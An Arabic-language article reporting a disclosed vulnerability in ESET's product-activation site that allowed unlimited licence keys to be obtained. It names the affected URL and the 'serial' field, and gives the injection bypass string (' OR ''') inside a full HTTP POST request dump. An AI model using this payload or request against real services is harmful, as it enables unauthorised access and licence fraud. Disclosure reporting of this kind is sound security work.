ثغرة خطيرة داخل موقع Eset Antivirus
قام الباحثون الأمنيون باكتشاف ثغرة خطيرة كادت أن تخسر الشركة خسائر مادية
فادحة، هذه الثغرة تتمثل في الحصول على عدد لا نهائي من الـ Keys الخاصة
بتفعيل البرنامج، مما يترتب عليه حصولك على برنامج مدفوع ومرخص لمدة سنة.
تكمن خطورة هذه الثغرة في استغلالها، حيث أن في حالة استغلال هذه الثغرة،
أو بيعها في الـ Black Market، كان ذلك سيؤثر على الشركة بشكل سلبي، وكان
سيكبدها خسائر مالية فادحة، بالإضافة إلى الضرر المعنوي الذي سيلحق بسمعة
بالشركة.
الباحث الأمني قام باكتشاف الثغرة في أحد
الـ Inputs الخاصة بعملية ملئ استمارة التسجيل وذلك للحصول على نسختك
المدفوعة من البرنامج، وتحديدا الـ Input المصاب هو الـ Input الخاص بالـ
Product Key
الطريف في الموضوع أنه بعد أن قام الباحث بإبلاغ الشركة بالثغرة كانت مكافأة الشركة له بأن منحته Product Key مجاني في حين أن الباحث كان باستطاعته الحصول على ملايين الـ Keys :D.
وإليكم تفاصيل الثغرة كالآتي:ـ
[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ‘ OR ”’
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885
-----------------------------25242107630722
Content-Disposition: form-data; name="serial"
' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"
20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"
Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"
Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"
Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"
SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"
12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"
-----------------------------25242107630722--
وكما ترون بالـ Request، الـ Input المصاب
هو الـ Input الخاص بالـ Product Key والذي قام الباحث الأمني بتمرير هذا
الـ string له (‘ OR ”’) مما يترتب عليه عمل Bypass وبالتالي تقوم الشركة
بإرسال بيانات التفعيل الخاصة بك على الإيميل بشكل فوري.
والفيديو التالي يوضح الـ PoC الخاصة بالثغرة:ـ